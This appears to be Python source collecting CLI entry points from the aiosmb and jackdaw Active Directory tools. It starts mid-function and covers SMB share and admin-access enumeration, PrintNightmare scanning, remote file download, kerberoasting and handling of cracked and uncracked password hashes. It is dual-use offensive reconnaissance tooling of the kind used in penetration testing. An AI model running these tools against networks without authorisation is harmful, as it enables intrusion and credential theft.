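				output_type = 'tsv'

			# argparse yields None when an exclusion list was not given.
			exclude_share = [] if args.es is None else args.es
			exclude_dir = [] if args.ed is None else args.ed
			exclude_target = [] if args.et is None else args.et

			# 'auto' is passed through unless --skip-ldap turns LDAP off.
			ldap_url = None if args.skip_ldap is True else 'auto'

			await shareenum(
				smb_url = 'auto',
				targets = args.target,
				smb_worker_count = args.worker_count,
				depth = args.depth,
				out_file = args.out_file,
				progress = args.progress,
				max_items = args.maxitems,
				dirsd = args.dirsd,
				filesd = args.filesd,
				authmethod = args.authmethod,
				protocol_version = args.protocol_version,
				output_type = output_type,
				max_runtime = args.max_runtime,
				exclude_share = exclude_share,
				exclude_dir = exclude_dir,
				ldap_url = ldap_url,
				exclude_target = exclude_target,
			)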
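async def amain():
	"""Entry coroutine of the SMB admin-access checker CLI.

	Resolves the connection either from ``--url`` or from the parameter
	options added by ``SMBConnectionParams``, builds an ``SMBAdminCheck`` and
	feeds it target generators: stdin (``--stdin`` with no positional
	targets), a file per positional target that can be opened, and a list of
	everything else, which is taken as a host name.  ``logger``, ``logging``,
	``asyncio``, ``SMBAdminCheck``, ``ListTargetGen`` and ``FileTargetGen``
	are module-level names.
	"""
	import argparse
	import sys
	from aiosmb.commons.connection.params import SMBConnectionParams

	epilog = """
Output legend:
    [SHARE] C$ is accessible
    [SRV] Remote Service Manager is accessible
    [REG] Remote registry is accessible
    [E] Error
    [P] Progress (current/total)
"""

	parser = argparse.ArgumentParser(description='SMB Share enumerator', formatter_class=argparse.RawDescriptionHelpFormatter, epilog=epilog)
	SMBConnectionParams.extend_parser(parser)
	parser.add_argument('-v', '--verbose', action='count', default=0)
	parser.add_argument('-w', '--smb-worker-count', type=int, default=100, help='Parallell count')
	parser.add_argument('-s', '--stdin', action='store_true', help='Read targets from stdin')
	parser.add_argument('--url', help='Connection URL base, target can be set to anything. Owerrides all parameter based connection settings! Example: "smb2+ntlm-password://TEST\\victim@test"')
	parser.add_argument('targets', nargs='*', help = 'Hostname or IP address or file with a list of targets')
	args = parser.parse_args()

	if args.verbose >= 1:
		logger.setLevel(logging.DEBUG)

	if args.verbose > 2:
		print('setting deepdebug')
		logger.setLevel(1)  # enabling deep debug
		# Inside a coroutine get_event_loop() is the running loop, so the
		# debug flag really applies here.
		asyncio.get_event_loop().set_debug(True)
		logging.basicConfig(level=logging.DEBUG)

	# --url wins over the individual connection parameters.
	smb_url = None
	if args.url is not None:
		smb_url = args.url
	else:
		try:
			smb_url = SMBConnectionParams.parse_args(args)
		except Exception as e:
			print('Either URL or all connection parameters must be set! Error: %s' % str(e))
			sys.exit(1)

	enumerator = SMBAdminCheck(smb_url, worker_count = args.smb_worker_count)

	notfile = []
	if len(args.targets) == 0 and args.stdin is True:
		enumerator.target_gens.append(ListTargetGen(sys.stdin))
	else:
		for target in args.targets:
			# A target that opens as a file is a target list; one that cannot
			# be opened (missing, unreadable, a directory) is taken as a host.
			# Only OSError is swallowed: Ctrl-C and genuine bugs (including a
			# failing FileTargetGen) now surface instead of silently turning
			# the path into a host name, as the former bare except did.
			try:
				with open(target, 'r'):
					pass
			except OSError:
				notfile.append(target)
			else:
				enumerator.target_gens.append(FileTargetGen(target))

	if len(notfile) > 0:
		enumerator.target_gens.append(ListTargetGen(notfile))

	if len(enumerator.target_gens) == 0:
		print('[-] No suitable targets were found!')
		return

	await enumerator.run()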
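async def run(args):
    """Run one jackdaw CLI sub-command selected by ``args.command``.

    Args:
        args: parsed argparse namespace. ``args.verbose`` selects the log
            level, ``args.sql`` is the database connection string that every
            sub-command reads, and the remaining attributes are sub-command
            specific (see the branches below).

    Side effects:
        Reconfigures the root, jackdaw, msldap and aiosmb loggers, sets the
        ``JACKDAW_SQLITE`` environment variable for sqlite URLs, and exits
        the process with status 1 when ``--sql`` is missing.

    Raises:
        Exception: ``files`` with ``--src domain`` but without ``--ad-id``.
    """
    print(__banner__)

    # Verbosity ladder: 0 = INFO for jackdaw only, 1 = DEBUG for jackdaw and
    # INFO for the protocol libraries, 2+ = level 1 ("deep debug") everywhere.
    if args.verbose == 0:
        logging.basicConfig(level=logging.INFO)
        jdlogger.setLevel(logging.INFO)
        msldaplogger.setLevel(logging.WARNING)
        smblogger.setLevel(logging.CRITICAL)

    elif args.verbose == 1:
        logging.basicConfig(level=logging.DEBUG)
        jdlogger.setLevel(logging.DEBUG)
        msldaplogger.setLevel(logging.INFO)
        smblogger.setLevel(logging.INFO)

    elif args.verbose > 1:
        # NOTE(review): protocol-level tracing from msldap/aiosmb at this
        # level may carry authentication material — confirm what they emit
        # before sending such logs anywhere shared.
        logging.basicConfig(level=1)
        msldaplogger.setLevel(logging.DEBUG)
        jdlogger.setLevel(1)
        smblogger.setLevel(1)

    if not args.sql:
        print(
            'SQL connection identification is missing! You need to provide the --sql parameter'
        )
        # Non-zero status: a missing mandatory parameter is an error and
        # scripts wrapping this tool must not see a success exit code.
        sys.exit(1)

    db_conn = args.sql
    # Lets the DB layer pick sqlite-specific behaviour. The variable is only
    # ever set to '1' here, never cleared.
    if args.sql.lower().startswith('sqlite'):
        os.environ['JACKDAW_SQLITE'] = '1'

    if args.command == 'enum':
        # Full run: LDAP enumeration first (creates the ADInfo row), then SMB
        # gathering against that AD id, optionally followed by share crawling.
        smb_mgr = construct_smbdef(args)
        ldap_mgr = construct_ldapdef(args)

        mgr = LDAPEnumeratorManager(db_conn,
                                    ldap_mgr,
                                    agent_cnt=args.ldap_workers)
        adifo_id = await mgr.run()
        jdlogger.info('ADInfo entry successfully created with ID %s' %
                      adifo_id)

        mgr = SMBGathererManager(smb_mgr,
                                 worker_cnt=args.smb_workers,
                                 queue_size=args.smb_queue_size)
        mgr.gathering_type = ['all']
        mgr.db_conn = db_conn
        mgr.target_ad = adifo_id
        await mgr.run()

        if args.smb_share_enum is True:
            settings_base = SMBShareGathererSettings(adifo_id, smb_mgr, None,
                                                     None, None)
            settings_base.dir_depth = args.smb_folder_depth
            mgr = ShareGathererManager(settings_base,
                                       db_conn=db_conn,
                                       worker_cnt=args.smb_workers)
            # NOTE(review): not awaited, unlike the managers above — confirm
            # ShareGathererManager.run() is synchronous.
            mgr.run()

    elif args.command == 'dbinit':
        create_db(db_conn)

    elif args.command == 'adinfo':
        # List every stored AD snapshot as (id, dotted domain name, fetch time).
        session = get_session(db_conn)
        from jackdaw.dbmodel.adinfo import JackDawADInfo
        from jackdaw.utils.table import print_table

        rows = [['Ad ID', 'domain name', 'scantime']]
        for did, distinguishedName, creation in session.query(
                JackDawADInfo).with_entities(JackDawADInfo.id,
                                             JackDawADInfo.distinguishedName,
                                             JackDawADInfo.fetched_at).all():
            # "DC=corp,DC=local" -> "corp.local"
            name = distinguishedName.replace('DC=', '')
            name = name.replace(',', '.')
            rows.append([str(did), name, creation.isoformat()])
        print_table(rows)

    elif args.command == 'ldap':
        ldap_mgr = construct_ldapdef(args)
        # The client object is created but not handed to the manager; kept as
        # in the original in case get_client() performs connection setup —
        # confirm whether it is needed.
        ldap_conn = ldap_mgr.get_client()

        mgr = LDAPEnumeratorManager(db_conn,
                                    ldap_mgr,
                                    agent_cnt=args.ldap_workers,
                                    queue_size=args.ldap_queue_size,
                                    ad_id=args.ad_id)
        adifo_id = await mgr.run()
        jdlogger.info('ADInfo entry successfully created with ID %s' %
                      adifo_id)

    elif args.command in ['shares', 'sessions', 'localgroups', 'smball']:
        # 'smball' is the CLI alias for the gatherer's 'all' type.
        if args.command == 'smball':
            args.command = 'all'
        smb_mgr = construct_smbdef(args)
        mgr = SMBGathererManager(smb_mgr,
                                 worker_cnt=args.smb_workers,
                                 queue_size=args.smb_queue_size)
        mgr.gathering_type = [args.command]
        mgr.db_conn = db_conn
        mgr.lookup_ad = args.lookup_ad

        if args.ldap_url:
            ldap_mgr = construct_ldapdef(args)
            ldap_conn = ldap_mgr.get_client()
            mgr.ldap_conn = ldap_conn

        if args.ad_id:
            mgr.target_ad = args.ad_id

        if args.target_file:
            mgr.targets_file = args.target_file

        await mgr.run()

    elif args.command == 'files':
        # Only the 'domain' source is implemented; other sources fall through
        # silently.
        if args.src == 'domain':
            if not args.ad_id:
                raise Exception('ad-id parameter is mandatory in ldap mode')

            mgr = SMBConnectionURL(args.smb_url)
            settings_base = SMBShareGathererSettings(args.ad_id, mgr, None,
                                                     None, None)
            settings_base.dir_depth = args.smb_folder_depth
            settings_base.dir_with_sd = args.with_sid
            settings_base.file_with_sd = args.with_sid

            mgr = ShareGathererManager(settings_base,
                                       db_conn=db_conn,
                                       worker_cnt=args.smb_workers)
            # NOTE(review): not awaited — see the 'enum' branch.
            mgr.run()

    # Credential helpers get the same --sql connection string as everything
    # else. Earlier revisions read args.db_conn here, which the --sql check
    # above indicates the parser never defines.
    elif args.command == 'creds':
        creds = JackDawCredentials(db_conn, args.domain_id)
        creds.add_credentials_impacket(args.impacket_file)

    elif args.command == 'passwords':
        creds = JackDawCredentials(db_conn)
        creds.add_cracked_passwords(args.potfile, args.disable_usercheck,
                                    args.disable_passwordcheck)

    elif args.command == 'uncracked':
        creds = JackDawCredentials(db_conn, args.domain_id)
        creds.get_uncracked_hashes(args.hash_type, args.history)

    elif args.command == 'cracked':
        creds = JackDawCredentials(db_conn, args.domain_id)
        creds.get_cracked_info()

    elif args.command == 'nest':
        from jackdaw.nest.wrapper import NestServer

        # Any -v turns on the web server's debug mode.
        # NOTE(review): if NestServer's debug flag enables a framework
        # debugger/reloader, leaving it on while bound to a non-loopback
        # address is a code-execution exposure — confirm what it does.
        debug = bool(args.verbose)

        server = NestServer(args.sql,
                            bind_ip=args.ip,
                            bind_port=args.port,
                            debug=debug)
        server.run()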
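async def amain():
	"""Command-line entry point for the SMB PrintNightmare enumerator.

	Parses ``sys.argv``, builds the SMB connection URL either from ``--url``
	or from the individual ``SMBConnectionParams`` options, collects targets
	from positional arguments, target files or stdin, and runs
	``SMBPrintnightmareEnum`` over them.

	Side effects:
		Adjusts ``logger`` verbosity (and asyncio debug mode at -vvv), and
		exits with status 1 when no usable connection settings are given.
	"""
	import argparse
	import sys
	from aiosmb.commons.connection.params import SMBConnectionParams

	epilog = """
Output legend:
    [S] Share
    [D] Dictionary
    [F] File
    [E] Error
    [M] Maxed (max items limit reached for directory)
    [P] Progress (current/total)
"""

	parser = argparse.ArgumentParser(description='SMB Printnightmare enumerator', formatter_class=argparse.RawDescriptionHelpFormatter, epilog=epilog)
	SMBConnectionParams.extend_parser(parser)
	parser.add_argument('-v', '--verbose', action='count', default=0)
	parser.add_argument('-w', '--smb-worker-count', type=int, default=100, help='Parallell count')
	parser.add_argument('-o', '--out-file', help='Output file path.')
	parser.add_argument('-s', '--stdin', action='store_true', help='Read targets from stdin')
	# NOTE(review): the URL carries the credential; passed on the command line
	# it is visible in the process list and shell history.
	parser.add_argument('--url', help='Connection URL base, target can be set to anything. Owerrides all parameter based connection settings! Example: "smb2+ntlm-password://TEST\\victim@test"')
	parser.add_argument('--progress', action='store_true', help='Show progress bar')
	parser.add_argument('--json', action='store_true', help='Output in JSON format')
	parser.add_argument('--tsv', action='store_true', help='Output in TSV format. (TAB Separated Values)')
	parser.add_argument('targets', nargs='*', help = 'Hostname or IP address or file with a list of targets')

	args = parser.parse_args()

	if args.verbose >= 1:
		logger.setLevel(logging.DEBUG)

	if args.verbose > 2:
		print('setting deepdebug')
		logger.setLevel(1) #enabling deep debug
		asyncio.get_event_loop().set_debug(True)
		logging.basicConfig(level=logging.DEBUG)

	# --tsv wins over --json when both are given.
	output_type = 'str'
	if args.json is True:
		output_type = 'json'
	if args.tsv is True:
		output_type = 'tsv'

	smb_url = None
	if args.url is not None:
		smb_url = args.url
	else:
		try:
			smb_url = SMBConnectionParams.parse_args(args)
		except Exception as e:
			print('Either URL or all connection parameters must be set! Error: %s' % str(e))
			sys.exit(1)

	enumerator = SMBPrintnightmareEnum(
		smb_url,
		worker_count = args.smb_worker_count,
		out_file = args.out_file,
		show_pbar = args.progress,
		output_type = output_type,
	)

	# Each positional is probed as a local path: readable file -> list of
	# targets, anything else -> a single host. A host name that happens to
	# match a local file is therefore read as a file.
	not_file = []
	if not args.targets and args.stdin:
		enumerator.target_gens.append(ListTargetGen(sys.stdin))
	else:
		for target in args.targets:
			try:
				with open(target, 'r'):
					pass
			except OSError:
				not_file.append(target)
			else:
				enumerator.target_gens.append(FileTargetGen(target))

	if not_file:
		enumerator.target_gens.append(ListTargetGen(not_file))

	# No targets at all: enumerate the host named in the connection URL.
	if not enumerator.target_gens:
		enumerator.enum_url = True

	await enumerator.run()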
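async def amain():
    """Command-line entry point for the SMB file downloader (``SMBGET``).

    Parses ``sys.argv``, builds the SMB connection URL from ``--url`` or the
    individual ``SMBConnectionParams`` options, collects UNC targets from
    positional arguments, target files or stdin, and runs ``SMBGET``.

    Side effects:
        Adjusts ``logger`` verbosity (and asyncio debug mode at -vvv), and
        exits with status 1 when no usable connection settings are given.
    """
    import argparse
    import sys
    from aiosmb.commons.connection.params import SMBConnectionParams

    # NOTE(review): the description is inherited from the share enumerator;
    # this tool downloads files.
    parser = argparse.ArgumentParser(description='SMB Share enumerator')
    SMBConnectionParams.extend_parser(parser)
    parser.add_argument('-v', '--verbose', action='count', default=0)
    parser.add_argument('-s',
                        '--stdin',
                        action='store_true',
                        help='Read targets from stdin')
    parser.add_argument(
        '-r',
        '--recursive',
        action='store_true',
        help='Recirsively donwload all files from the remote folder')
    parser.add_argument('--progress',
                        action='store_true',
                        help='Show progress')
    # NOTE(review): the URL carries the credential; passed on the command
    # line it is visible in the process list and shell history.
    parser.add_argument(
        '--url',
        help=
        'Connection URL base, target can be set to anything. Owerrides all parameter based connection settings! Example: "smb2+ntlm-password://TEST\\victim@test"'
    )
    parser.add_argument(
        'targets',
        nargs='*',
        help='UNC paths of file eg. \\\\HOST\\SHARE\\file_or_folder')
    args = parser.parse_args()

    if args.verbose >= 1:
        logger.setLevel(logging.DEBUG)

    if args.verbose > 2:
        print('setting deepdebug')
        logger.setLevel(1)  #enabling deep debug
        asyncio.get_event_loop().set_debug(True)
        logging.basicConfig(level=logging.DEBUG)

    smb_url = None
    if args.url is not None:
        # The option is registered as --url, so the value lives in args.url;
        # reading args.smb_url here raised AttributeError whenever --url was
        # actually used.
        smb_url = args.url
    else:
        try:
            smb_url = SMBConnectionParams.parse_args(args)
        except Exception as e:
            print(
                'Either URL or all connection parameters must be set! Error: %s'
                % str(e))
            sys.exit(1)

    smbget = SMBGET(smb_url, show_progress=args.progress)

    # Each positional is probed as a local path: readable file -> list of
    # targets, anything else -> a single UNC path. A UNC path that happens
    # to match a local file is therefore read as a file.
    not_file = []
    if not args.targets and args.stdin:
        smbget.target_gens.append(ListTargetGen(sys.stdin))
    else:
        for target in args.targets:
            try:
                with open(target, 'r'):
                    pass
            except OSError:
                not_file.append(target)
            else:
                smbget.target_gens.append(FileTargetGen(target))

    if not_file:
        smbget.target_gens.append(ListTargetGen(not_file))

    if not smbget.target_gens:
        print('[-] No suitable targets were found!')
        return

    await smbget.run()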
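def run(args):
    """Run one jackdaw CLI sub-command selected by ``args.command`` (sync).

    Args:
        args: parsed argparse namespace. ``args.verbose`` selects the log
            level, ``args.sql`` is the database connection string that every
            sub-command reads, and the remaining attributes are sub-command
            specific (see the branches below).

    Side effects:
        Reconfigures the root, jackdaw, msldap and aiosmb loggers and exits
        the process with status 1 when ``--sql`` is missing.
    """
    # Verbosity ladder: 0 = INFO for jackdaw only, 1 = DEBUG for jackdaw and
    # INFO for the protocol libraries, 2+ = level 1 ("deep debug") everywhere.
    if args.verbose == 0:
        logging.basicConfig(level=logging.INFO)
        jdlogger.setLevel(logging.INFO)
        msldaplogger.setLevel(logging.WARNING)
        smblogger.setLevel(logging.CRITICAL)

    elif args.verbose == 1:
        logging.basicConfig(level=logging.DEBUG)
        jdlogger.setLevel(logging.DEBUG)
        msldaplogger.setLevel(logging.INFO)
        smblogger.setLevel(logging.INFO)

    elif args.verbose > 1:
        # NOTE(review): protocol-level tracing from msldap/aiosmb at this
        # level may carry authentication material — confirm what they emit
        # before sending such logs anywhere shared.
        logging.basicConfig(level=1)
        msldaplogger.setLevel(logging.DEBUG)
        jdlogger.setLevel(1)
        smblogger.setLevel(1)

    if not args.sql:
        print(
            'SQL connection identification is missing! You need to provide the --sql parameter'
        )
        # Non-zero status: a missing mandatory parameter is an error and
        # scripts wrapping this tool must not see a success exit code.
        sys.exit(1)

    db_conn = args.sql

    if args.command == 'enum':
        # Full run: LDAP enumeration first (creates the ADInfo row), then SMB
        # gathering against that AD id.
        smb_mgr = construct_smbdef(args)
        ldap_mgr = construct_ldapdef(args)

        mgr = LDAPEnumeratorManager(db_conn,
                                    ldap_mgr,
                                    agent_cnt=args.ldap_workers)
        adifo_id = mgr.run()
        print('ADInfo entry successfully created with ID %s' % adifo_id)

        mgr = SMBGathererManager(smb_mgr, worker_cnt=args.smb_workers)
        mgr.gathering_type = ['all']
        mgr.db_conn = db_conn
        mgr.target_ad = adifo_id
        mgr.run()

    elif args.command == 'dbinit':
        create_db(db_conn)

    elif args.command == 'adinfo':
        # List every stored AD snapshot as (id, dotted domain name, fetch time).
        session = get_session(db_conn)
        from jackdaw.dbmodel.adinfo import JackDawADInfo
        from jackdaw.utils.table import print_table

        rows = [['Ad ID', 'domain name', 'scantime']]
        for did, distinguishedName, creation in session.query(
                JackDawADInfo).with_entities(JackDawADInfo.id,
                                             JackDawADInfo.distinguishedName,
                                             JackDawADInfo.fetched_at).all():
            # "DC=corp,DC=local" -> "corp.local"
            name = distinguishedName.replace('DC=', '')
            name = name.replace(',', '.')
            rows.append([str(did), name, creation.isoformat()])
        print_table(rows)

    elif args.command == 'ldap':
        ldap_mgr = construct_ldapdef(args)
        # A connection is opened but never handed to the manager; presumably
        # an up-front reachability/authentication check — confirm, and note
        # it is never explicitly closed here.
        ldap_conn = ldap_mgr.get_connection()
        ldap_conn.connect()

        mgr = LDAPEnumeratorManager(db_conn,
                                    ldap_mgr,
                                    agent_cnt=args.ldap_workers)
        adifo_id = mgr.run()
        print('ADInfo entry successfully created with ID %s' % adifo_id)

    elif args.command in ['shares', 'sessions', 'localgroups']:
        smb_mgr = construct_smbdef(args)
        mgr = SMBGathererManager(smb_mgr)
        mgr.gathering_type = [args.command]
        mgr.db_conn = db_conn
        mgr.lookup_ad = args.lookup_ad

        if args.ldap_url:
            ldap_mgr = construct_ldapdef(args)
            ldap_conn = ldap_mgr.get_connection()
            ldap_conn.connect()
            mgr.ldap_conn = ldap_conn

        if args.ad_id:
            mgr.target_ad = args.ad_id

        if args.target_file:
            mgr.targets_file = args.target_file

        mgr.run()

    # Credential helpers get the same --sql connection string as everything
    # else. Earlier revisions read args.db_conn here, which the --sql check
    # above indicates the parser never defines.
    elif args.command == 'creds':
        creds = JackDawCredentials(db_conn, args.domain_id)
        creds.add_credentials_impacket(args.impacket_file)

    elif args.command == 'passwords':
        creds = JackDawCredentials(db_conn)
        creds.add_cracked_passwords(args.potfile, args.disable_usercheck,
                                    args.disable_passwordcheck)

    elif args.command == 'uncracked':
        creds = JackDawCredentials(db_conn, args.domain_id)
        creds.get_uncracked_hashes(args.hash_type, args.history)

    elif args.command == 'cracked':
        creds = JackDawCredentials(db_conn, args.domain_id)
        creds.get_cracked_info()

    elif args.command == 'nest':
        from jackdaw.nest.wrapper import NestServer

        # Any -v turns on the web server's debug mode.
        # NOTE(review): if NestServer's debug flag enables a framework
        # debugger/reloader, leaving it on while bound to a non-loopback
        # address is a code-execution exposure — confirm what it does.
        debug = bool(args.verbose)

        server = NestServer(args.sql,
                            bind_ip=args.ip,
                            bind_port=args.port,
                            debug=debug)
        server.run()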
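async def run(args):
    """Run one jackdaw CLI sub-command selected by ``args.command``.

    Args:
        args: parsed argparse namespace. ``args.verbose`` selects the log
            level, ``args.silent`` gates the banner and progress output,
            ``args.sql`` is the database connection string (optional only
            for ``auto``), and ``args.ldap_url`` / ``args.smb_url`` are read
            when present. The remaining attributes are sub-command specific.

    Side effects:
        Reconfigures the root, jackdaw, msldap and aiosmb loggers, sets the
        ``JACKDAW_SQLITE`` environment variable, may create a
        ``multiprocessing.Pool``, and exits with status 1 when ``--sql`` is
        missing for a sub-command that needs it. Any other exception is
        logged through ``jdlogger.exception`` and swallowed, so the coroutine
        then returns normally and the process exit status stays 0.
    """
    try:
        # NOTE(review): the banner (and the progress bar below) is enabled
        # when args.silent is True, i.e. the flag reads inverted. Either the
        # parser declares it with store_false or this is a bug — confirm.
        if args.silent is True:
            print(__banner__)

        # Verbosity ladder: 0 = INFO for jackdaw and the libraries muted
        # (smb at level 100, above CRITICAL), 1 = DEBUG for jackdaw,
        # 2+ = level 1 ("deep debug") everywhere.
        if args.verbose == 0:
            logging.basicConfig(level=logging.INFO)
            jdlogger.setLevel(logging.INFO)
            msldaplogger.setLevel(logging.CRITICAL)
            smblogger.setLevel(100)

        elif args.verbose == 1:
            logging.basicConfig(level=logging.DEBUG)
            jdlogger.setLevel(logging.DEBUG)
            msldaplogger.setLevel(logging.WARNING)
            smblogger.setLevel(logging.CRITICAL)

        elif args.verbose > 1:
            # NOTE(review): protocol-level tracing from msldap/aiosmb at this
            # level may carry authentication material — confirm what they
            # emit before sending such logs anywhere shared.
            logging.basicConfig(level=1)
            msldaplogger.setLevel(logging.DEBUG)
            jdlogger.setLevel(1)
            smblogger.setLevel(1)

        # 'auto' creates its own sqlite database, every other command needs
        # an explicit --sql.
        if not args.sql and args.command != 'auto':
            print(
                'SQL connection identification is missing! You need to provide the --sql parameter'
            )
            # Non-zero status: a missing mandatory parameter is an error and
            # scripts wrapping this tool must not see a success exit code.
            sys.exit(1)

        work_dir = './workdir'
        ldap_url = None
        smb_url = None

        # Not every sub-parser defines these, hence hasattr.
        if hasattr(args, 'ldap_url'):
            ldap_url = args.ldap_url
        if hasattr(args, 'smb_url'):
            smb_url = args.smb_url

        # Tell the DB layer whether it is talking to sqlite; no --sql means
        # the auto-generated sqlite database.
        db_conn = args.sql
        if db_conn is not None:
            os.environ['JACKDAW_SQLITE'] = '0'
            if args.sql.lower().startswith('sqlite'):
                os.environ['JACKDAW_SQLITE'] = '1'
        else:
            os.environ['JACKDAW_SQLITE'] = '1'

        if args.command == 'enum':
            # Full collection: LDAP + SMB + optional kerberoast, with edge
            # calculation; a returned error is re-raised into the handler
            # below so it gets logged with its traceback.
            with multiprocessing.Pool() as mp_pool:
                gatherer = Gatherer(db_conn,
                                    work_dir,
                                    ldap_url,
                                    smb_url,
                                    kerb_url=args.kerberoast,
                                    ldap_worker_cnt=args.ldap_workers,
                                    smb_worker_cnt=args.smb_workers,
                                    mp_pool=mp_pool,
                                    smb_gather_types=['all'],
                                    progress_queue=None,
                                    show_progress=args.silent,
                                    calc_edges=True,
                                    ad_id=None,
                                    dns=args.dns,
                                    no_work_dir=args.no_work_dir)
                res, err = await gatherer.run()
                if err is not None:
                    raise err

        elif args.command == 'auto':
            # Windows-only: derives everything from the logged-on user's
            # session (see run_auto). Failure is printed, not raised.
            _, err = await run_auto(ldap_worker_cnt=args.ldap_workers,
                                    smb_worker_cnt=args.smb_workers,
                                    dns=args.dns,
                                    work_dir=work_dir,
                                    show_progress=args.silent,
                                    no_work_dir=args.no_work_dir)
            if err is not None:
                print(err)

        elif args.command == 'dbinit':
            create_db(db_conn)

        elif args.command == 'adinfo':
            # List every stored AD snapshot as (id, dotted domain, fetch time).
            session = get_session(db_conn)
            from jackdaw.dbmodel.adinfo import ADInfo
            from jackdaw.utils.table import print_table

            rows = [['Ad ID', 'domain name', 'scantime']]
            for did, distinguishedName, creation in session.query(
                    ADInfo).with_entities(ADInfo.id, ADInfo.distinguishedName,
                                          ADInfo.fetched_at).all():
                # "DC=corp,DC=local" -> "corp.local"
                name = distinguishedName.replace('DC=', '')
                name = name.replace(',', '.')
                rows.append([str(did), name, creation.isoformat()])
            print_table(rows)

        elif args.command == 'ldap':
            # LDAP-only collection; the gatherer's return value is ignored
            # here, so a reported error surfaces only through its own logs.
            with multiprocessing.Pool() as mp_pool:
                gatherer = Gatherer(db_conn,
                                    work_dir,
                                    ldap_url,
                                    smb_url,
                                    ldap_worker_cnt=args.ldap_workers,
                                    smb_worker_cnt=None,
                                    mp_pool=mp_pool,
                                    smb_gather_types=['all'],
                                    progress_queue=None,
                                    show_progress=args.silent,
                                    calc_edges=args.calculate_edges,
                                    ad_id=args.ad_id,
                                    no_work_dir=args.no_work_dir)
                await gatherer.run()

        elif args.command == 'kerberoast':
            gatherer = Gatherer(db_conn,
                                work_dir,
                                None,
                                None,
                                kerb_url=args.kerberos_url,
                                ldap_worker_cnt=None,
                                smb_worker_cnt=None,
                                mp_pool=None,
                                smb_gather_types=[],
                                progress_queue=None,
                                show_progress=False,
                                calc_edges=False,
                                ad_id=args.ad_id)
            await gatherer.run()
            print('Kerberoast Finished!')

        elif args.command in ['shares', 'sessions', 'localgroups', 'smball']:
            # 'smball' is the CLI alias for the gatherer's 'all' type. Note
            # that smb_gather_types receives the bare string here, whereas
            # the other branches pass a list — confirm Gatherer accepts both.
            if args.command == 'smball':
                args.command = 'all'

            gatherer = Gatherer(
                db_conn,
                work_dir,
                ldap_url,
                smb_url,
                ad_id=args.ad_id,
                ldap_worker_cnt=None,
                smb_worker_cnt=args.smb_workers,
                mp_pool=None,
                smb_gather_types=args.command,
                progress_queue=None,
                show_progress=args.silent,
                calc_edges=False,
                dns=args.dns,
            )
            await gatherer.run()

        elif args.command == 'dns':
            gatherer = Gatherer(
                db_conn,
                work_dir,
                None,
                None,
                ad_id=args.ad_id,
                ldap_worker_cnt=None,
                smb_worker_cnt=None,
                mp_pool=None,
                smb_gather_types=None,
                progress_queue=None,
                show_progress=args.silent,
                calc_edges=False,
                dns=args.dns,
            )
            await gatherer.run()

        elif args.command == 'version':
            print('Jackdaw version: %s' % jdversion)
            print('MSLDAP version : %s' % ldapversion)
            print('AIOSMB version : %s' % smbversion)

        elif args.command == 'files':
            # Share/file crawling has not been ported to the Gatherer yet.
            raise Exception('not yet implemented!')

        elif args.command == 'creds':
            creds = JackDawCredentials(db_conn, args.domain_id)
            creds.add_credentials_impacket(args.impacket_file)

        elif args.command == 'passwords':
            creds = JackDawCredentials(db_conn)
            creds.add_cracked_passwords(args.potfile, args.disable_usercheck,
                                        args.disable_passwordcheck)

        elif args.command == 'uncracked':
            creds = JackDawCredentials(db_conn, args.domain_id)
            creds.get_uncracked_hashes(args.hash_type, args.history)

        elif args.command == 'cracked':
            creds = JackDawCredentials(db_conn, args.domain_id)
            creds.get_cracked_info()

        elif args.command == 'recalc':
            # Recompute graph edges from data already in the DB; no
            # collection is performed.
            with multiprocessing.Pool() as mp_pool:
                gatherer = Gatherer(db_conn,
                                    work_dir,
                                    None,
                                    None,
                                    mp_pool=mp_pool,
                                    progress_queue=None,
                                    show_progress=args.silent,
                                    calc_edges=True,
                                    store_to_db=True,
                                    ad_id=None,
                                    graph_id=args.graphid)
                await gatherer.run()

        elif args.command == 'nest':
            from jackdaw.nest.wrapper import NestServer

            # Any -v turns on the web server's debug mode.
            # NOTE(review): if NestServer's debug flag enables a framework
            # debugger/reloader, leaving it on while bound to a non-loopback
            # address is a code-execution exposure — confirm what it does.
            debug = bool(args.verbose)

            server = NestServer(
                args.sql,
                bind_ip=args.ip,
                bind_port=args.port,
                debug=debug,
                work_dir=args.work_dir,
                graph_backend=args.backend,
            )
            server.run()

        elif args.command == 'ws':
            from jackdaw.nest.ws.server import NestWebSocketServer
            # NOTE(review): ssl_ctx=None starts the websocket server without
            # TLS; anything bound beyond loopback serves the collected AD
            # data in clear — confirm whether the server adds its own
            # authentication.
            server = NestWebSocketServer(args.listen_ip,
                                         args.listen_port,
                                         args.sql,
                                         args.work_dir,
                                         args.backend,
                                         ssl_ctx=None)
            await server.run()

        elif args.command == 'bhimport':
            from jackdaw.utils.bhimport import BHImport
            print(
                'DISCLAIMER! This feature is still beta! Bloodhound acquires way less data than Jackdaw therefore not all functionality will work after import. Any errors during import will be silently ignored, use "-vvv" verbosity level to see all errors.'
            )
            bh = BHImport.from_zipfile(args.bhfile)
            bh.db_conn = db_conn
            if args.verbose > 1:
                bh.set_debug(True)
            bh.run()
            print('Import complete!')

    except Exception:
        # Top-level boundary: log with traceback and return normally.
        # SystemExit from the --sql check above is not an Exception and
        # still propagates.
        jdlogger.exception('main')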
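async def run_auto(ldap_worker_cnt=None,
                   smb_worker_cnt=500,
                   dns=None,
                   work_dir='./workdir',
                   db_conn=None,
                   show_progress=True,
                   no_work_dir=False):
    """Run a full ``Gatherer`` pass using the current Windows logon session.

    Domain, user name and logon server are read from the logon session via
    ``winacl``; empty values fall back to the ``USERDOMAIN`` / ``LOGONSERVER``
    environment variables. Before any work starts the logon server is probed
    on TCP/389 (LDAP) with a 2 second budget. When ``db_conn`` is ``None`` a
    SQLite database named ``<domain>_<UTC timestamp>.db`` is created in the
    current directory, and when ``dns`` is ``None`` a resolver is chosen with
    ``get_correct_dns_win``.

    Args:
        ldap_worker_cnt: LDAP worker count handed to ``Gatherer``.
        smb_worker_cnt: SMB worker count handed to ``Gatherer``.
        dns: DNS server address, or ``None`` to auto-detect.
        work_dir: Working directory handed to ``Gatherer``.
        db_conn: SQLAlchemy connection string; created when ``None``.
        show_progress: Forwarded to ``Gatherer``.
        no_work_dir: Forwarded to ``Gatherer``.

    Returns:
        ``(True, None)`` on success, ``(False, exc)`` on any failure. The
        function does not raise: every exception is folded into the tuple.
    """
    try:
        if platform.system() != 'Windows':
            raise Exception('auto mode only works on windows!')

        # Level 100 is above CRITICAL, i.e. the SMB library is silenced.
        smblogger.setLevel(100)
        from winacl.functions.highlevel import get_logon_info
        logon = get_logon_info()

        jdlogger.debug(str(logon))
        # Fill blanks from the environment; a missing variable yields '' so
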